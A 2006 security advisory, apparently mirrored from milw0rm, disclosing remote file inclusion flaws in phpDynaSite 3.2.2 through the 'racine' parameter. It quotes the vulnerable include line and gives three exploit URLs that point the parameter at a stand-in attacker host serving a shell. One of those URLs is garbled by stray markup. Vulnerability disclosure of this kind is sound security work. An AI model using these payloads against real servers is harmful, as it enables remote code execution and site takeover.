Security Advisory: phpDynaSite <= 3.2.2 (racine) Remote File Include Vulnerabilities

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Ariadne v2.4 (store_config[cod
e]) Remote File Include Vuln
  Ariadne v2.4 (store_config[cod
e]) Remote File Include Vuln
  SazCart <= 1.5 (cart.php) Remote File Include Vulnerability
  [Full-disclosure] [x0n3-h4ck.org] Bug on Drake CMS v0.2

From: Dr.Pantagon <rezayavari2006_(at)_yahoo.com>
Date: 05.11.2006
Subject: phpDynaSite <= 3.2.2 (racine) Remote File Include Vulnerabilities

*********************************************************************************
*************************
                                                   WwW.Deltahacking.NeT

*********************************************************************************
*************************

* dynasite3.2.2

* Class = Remote File Inclusion ;

* Download = http://jaist.dl.sourceforge.net:80/sourceforge/phpdynasite/dynasite3.2.2.tar.gz

* Found by = Dr.Pantagon (rezayavari2006@yahoo.com)

---------------------------------------------------------------------------------
----------------------------------

- Vulnerable Code

    include($racine."connection.php");

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:

   http://[target]/[path]/function_log.php?racine=http://evilsite.com/shell?
   http://[target]/[path]/function_balise_url.php?racine=ss="fixed">http://evilsite.com/shell?
   http://[target]/[path]/connection.php?racine=http://evilsite.com/shell?

---------------------------------------------------------------------------------
---------------------------------

Gr33tz: Dr.Torojan

*********************************************************************************
*****************************

# milw0rm.com [2006-11-04]

test server